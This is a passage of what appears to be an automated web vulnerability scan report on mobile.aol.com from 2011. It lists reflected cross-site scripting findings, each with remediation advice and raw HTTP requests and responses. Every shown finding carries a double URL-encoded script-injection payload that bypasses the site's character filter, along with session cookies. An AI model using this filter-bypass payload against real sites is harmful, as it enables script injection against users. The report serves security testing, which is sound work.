Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:15 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:15 GMT; path=/
Content-Type: text/html
Content-Length: 23708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhoneed1ec</script><script>alert(1)</script>16f4afc7846";
   s_265.prop2="aol-radio";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script
...[SNIP]...

5.117. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/aol-radio/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76830%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9a6362a6e9 was submitted in the REST URL parameter 3. This input was echoed as 76830</script><script>alert(1)</script>a9a6362a6e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/aol-radio76830%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9a6362a6e9/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:55 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:55 GMT; path=/
Content-Type: text/html
Content-Length: 23656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="aol-radio76830</script><script>alert(1)</script>a9a6362a6e9";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.118. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/daily-finance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7de3f%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06bfb8595ba was submitted in the REST URL parameter 2. This input was echoed as 7de3f</script><script>alert(1)</script>06bfb8595ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone7de3f%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06bfb8595ba/daily-finance/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617149869-Repeat%7C1367689149869%3B%20s_nrgvo%3DRepeat%7C1367689149870%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:17 GMT; path=/
Content-Type: text/html
Content-Length: 23719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone7de3f</script><script>alert(1)</script>06bfb8595ba";
   s_265.prop2="daily-finance";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('sc
...[SNIP]...

5.119. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/daily-finance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50ba1%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d0ecf0a2c was submitted in the REST URL parameter 2. This input was echoed as 50ba1</script><script>alert(1)</script>35d0ecf0a2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone50ba1%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d0ecf0a2c/daily-finance/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617149869-Repeat%7C1367689149869%3B%20s_nrgvo%3DRepeat%7C1367689149870%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:33 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:33 GMT; path=/
Content-Type: text/html
Content-Length: 23720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhone50ba1</script><script>alert(1)</script>35d0ecf0a2c';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.120. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/daily-finance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 149c0%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdad91adfaf was submitted in the REST URL parameter 3. This input was echoed as 149c0</script><script>alert(1)</script>cdad91adfaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/daily-finance149c0%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdad91adfaf/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617149869-Repeat%7C1367689149869%3B%20s_nrgvo%3DRepeat%7C1367689149870%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:58 GMT; path=/
Content-Type: text/html
Content-Length: 23666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
d : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="daily-finance149c0</script><script>alert(1)</script>cdad91adfaf";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.121. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/engadget/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fd41%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdd21a05859 was submitted in the REST URL parameter 2. This input was echoed as 8fd41</script><script>alert(1)</script>cdd21a05859 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone8fd41%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdd21a05859/engadget/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617157683-Repeat%7C1367689157683%3B%20s_nrgvo%3DRepeat%7C1367689157684%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:26 GMT; path=/
Content-Type: text/html
Content-Length: 23704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone8fd41</script><script>alert(1)</script>cdd21a05859";
   s_265.prop2="engadget";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script'
...[SNIP]...

5.122. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/engadget/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 847e2%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04b562a1c3d was submitted in the REST URL parameter 2. This input was echoed as 847e2</script><script>alert(1)</script>04b562a1c3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone847e2%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04b562a1c3d/engadget/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617157683-Repeat%7C1367689157683%3B%20s_nrgvo%3DRepeat%7C1367689157684%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:42 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:42 GMT; path=/
Content-Type: text/html
Content-Length: 23704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhone847e2</script><script>alert(1)</script>04b562a1c3d';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.123. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/engadget/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0a91%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee988df3f567 was submitted in the REST URL parameter 3. This input was echoed as b0a91</script><script>alert(1)</script>e988df3f567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/engadgetb0a91%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee988df3f567/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617157683-Repeat%7C1367689157683%3B%20s_nrgvo%3DRepeat%7C1367689157684%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:42:06 GMT; path=/
Content-Type: text/html
Content-Length: 23654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
e="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="engadgetb0a91</script><script>alert(1)</script>e988df3f567";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.124. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/iPad/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b9fd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f9cd963758 was submitted in the REST URL parameter 2. This input was echoed as 8b9fd</script><script>alert(1)</script>5f9cd963758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone8b9fd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f9cd963758/iPad/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:13 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:13 GMT; path=/
Content-Type: text/html
Content-Length: 23692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone8b9fd</script><script>alert(1)</script>5f9cd963758";
   s_265.prop2="iPad";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');

...[SNIP]...

5.125. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.aol.com
Path:   /product/iPhone/iPad/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab98b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ffb41f2480 was submitted in the REST URL parameter 2. This input was echoed as ab98b</script><script>alert(1)</script>0ffb41f2480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhoneab98b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ffb41f2480/iPad/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:28 GMT; path=/
Content-Type: text/html
Content-Length: 23692

